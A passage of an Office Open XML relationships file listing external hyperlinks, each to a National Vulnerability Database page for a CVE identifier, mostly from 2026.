TargetMode="External" Id="rId1325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86076" TargetMode="External" Id="rId1326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86169" TargetMode="External" Id="rId1327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86173" TargetMode="External" Id="rId1328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86177" TargetMode="External" Id="rId1329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86193" TargetMode="External" Id="rId1330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86195" TargetMode="External" Id="rId1331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86196" TargetMode="External" Id="rId1332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86199" TargetMode="External" Id="rId1333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86201" TargetMode="External" Id="rId1334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86250" TargetMode="External" Id="rId1335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86427" TargetMode="External" Id="rId1336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86428" TargetMode="External" Id="rId1337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86429" TargetMode="External" Id="rId1338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86430" TargetMode="External" Id="rId1339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86433" TargetMode="External" Id="rId1340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86434" TargetMode="External" Id="rId1341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86435" TargetMode="External" Id="rId1342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86439" TargetMode="External" Id="rId1343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86452" TargetMode="External" Id="rId1344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86538" TargetMode="External" Id="rId1345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86721" TargetMode="External" Id="rId1346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86727" TargetMode="External" Id="rId1347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86728" TargetMode="External" Id="rId1348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86730" TargetMode="External" Id="rId1349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86732" TargetMode="External" Id="rId1350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87807" TargetMode="External" Id="rId1351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87808" TargetMode="External" Id="rId1352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87816" TargetMode="External" Id="rId1353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87817" TargetMode="External" Id="rId1354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87819" TargetMode="External" Id="rId1355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87822" TargetMode="External" Id="rId1356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87824" TargetMode="External" Id="rId1357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87962" TargetMode="External" Id="rId1358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87995" TargetMode="External" Id="rId1359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88260" TargetMode="External" Id="rId1360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88861" TargetMode="External" Id="rId1361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88862" TargetMode="External" Id="rId1362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88874" TargetMode="External" Id="rId1363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88876" TargetMode="External" Id="rId1364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88893" TargetMode="External" Id="rId1365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88939" TargetMode="External" Id="rId1366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88959" TargetMode="External" Id="rId1367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89146" TargetMode="External" Id="rId1368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89147" TargetMode="External" Id="rId1369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89174" TargetMode="External" Id="rId1370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89176" TargetMode="External" Id="rId1371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89177" TargetMode="External" Id="rId1372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89178" TargetMode="External" Id="rId1373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89250" TargetMode="External" Id="rId1374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-35585" TargetMode="External" Id="rId1375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61732" TargetMode="External" Id="rId1376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10754" TargetMode="External" Id="rId1377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14962" TargetMode="External" Id="rId1378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19233" TargetMode="External" Id="rId1379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21087" TargetMode="External" Id="rId1380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25990" TargetMode="External" Id="rId1381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26212" TargetMode="External" Id="rId1382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34223" TargetMode="External" Id="rId1383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34741" TargetMode="External" Id="rId1384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4129" TargetMode="External" Id="rId1385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44492" TargetMode="External" Id="rId1386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45293" TargetMode="External" Id="rId1387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47194" TargetMode="External" Id="rId1388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47664" TargetMode="External" Id="rId1389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47727" TargetMode="External" Id="rId1390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48007" TargetMode="External" Id="rId1391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48120" TargetMode="External" Id="rId1392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49310" TargetMode="External" Id="rId1393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49864" TargetMode="External" Id="rId1394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50553" TargetMode="External" Id="rId1395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52776" TargetMode="External" Id="rId1396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52854" TargetMode="External" Id="rId1397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53455" TargetMode="External" Id="rId1398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53783" TargetMode="External" Id="rId1399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54511" TargetMode="External" Id="rId1400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54603" TargetMode="External" Id="rId1401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54650" TargetMode="External" Id="rId1402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54730" TargetMode="External" Id="rId1403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55182" TargetMode="External" Id="rId1404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55534" TargetMode="External" Id="rId1405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55539" TargetMode="External" Id="rId1406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55557" TargetMode="External" Id="rId1407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55580" TargetMode="External" Id="rId1408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55848" TargetMode="External" Id="rId1409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56703" TargetMode="External" Id="rId1410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56711" TargetMode="External" Id="rId1411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58014" TargetMode="External" Id="rId1412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61517" TargetMode="External" Id="rId1413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61523" TargetMode="External" Id="rId1414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61524" TargetMode="External" Id="rId1415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63219" TargetMode="External" Id="rId1416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63637" TargetMode="External" Id="rId1417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64199" TargetMode="External" Id="rId1418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66420" TargetMode="External" Id="rId1419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67328" TargetMode="External" Id="rId1420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67340" TargetMode="External" Id="rId1421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67608" TargetMode="External" Id="rId1422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67610" TargetMode="External" Id="rId1423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68581" TargetMode="External" Id="rId1424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71309" TargetMode="External" Id="rId1425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71504" TargetMode="External" Id="rId1426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71963" TargetMode="External" Id="rId1427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72001" TargetMode="External" Id="rId1428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72741" TargetMode="External" Id="rId1429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73078" TargetMode="External" Id="rId1430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73247" TargetMode="External" Id="rId1431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73612" TargetMode="External" Id="rId1432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73670" TargetMode="External" Id="rId1433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73694" TargetMode="External" Id="rId1434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73698" TargetMode="External" Id="rId1435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73699" TargetMode="External" Id="rId1436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74239" TargetMode="External" Id="rId1437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75121" TargetMode="External" Id="rId1438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75122" TargetMode="External" Id="rId1439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75123" TargetMode="External" Id="rId1440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75829" TargetMode="External" Id="rId1441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75833" TargetMode="External" Id="rId1442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75990" TargetMode="External" Id="rId1443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75991" TargetMode="External" Id="rId1444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76190" TargetMode="External" Id="rId1445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76199" TargetMode="External" Id="rId1446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77109" TargetMode="External" Id="rId1447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77774" TargetMode="External" Id="rId1448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78302" TargetMode="External" Id="rId1449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79322" TargetMode="External" Id="rId1450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79697" TargetMode="External" Id="rId1451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79698" TargetMode="External" Id="rId1452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79721" TargetMode="External" Id="rId1453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80097" TargetMode="External" Id="rId1454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80214" TargetMode="External" Id="rId1455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8044" TargetMode="External" Id="rId1456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81213" TargetMode="External" Id="rId1457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81789" TargetMode="External" Id="rId1458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81889" TargetMode="External" Id="rId1459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82304" TargetMode="External" Id="rId1460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82461" TargetMode="External" Id="rId1461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82475" TargetMode="External" Id="rId1462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82684" TargetMode="External" Id="rId1463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82712" TargetMode="External" Id="rId1464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84068" TargetMode="External" Id="rId1465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84194" TargetMode="External" Id="rId1466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84203" TargetMode="External" Id="rId1467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84452" TargetMode="External" Id="rId1468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85217" TargetMode="External" Id="rId1469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85388" TargetMode="External" Id="rId1470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85546" TargetMode="External" Id="rId1471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86167" TargetMode="External" Id="rId1472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86185" TargetMode="External" Id="rId1473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86299" TargetMode="External" Id="rId1474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86437" TargetMode="External" Id="rId1475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86438" TargetMode="External" Id="rId1476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86509" TargetMode="External" Id="rId1477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86510" TargetMode="External" Id="rId1478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86712" TargetMode="External" Id="rId1479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86720" TargetMode="External" Id="rId1480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86722" TargetMode="External" Id="rId1481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86723" TargetMode="External" Id="rId1482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86733" TargetMode="External" Id="rId1483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86762" TargetMode="External" Id="rId1484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86770" TargetMode="External" Id="rId1485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87633" TargetMode="External" Id="rId1486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87794" TargetMode="External" Id="rId1487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87931" TargetMode="External" Id="rId1488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88047" TargetMode="External" Id="rId1489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 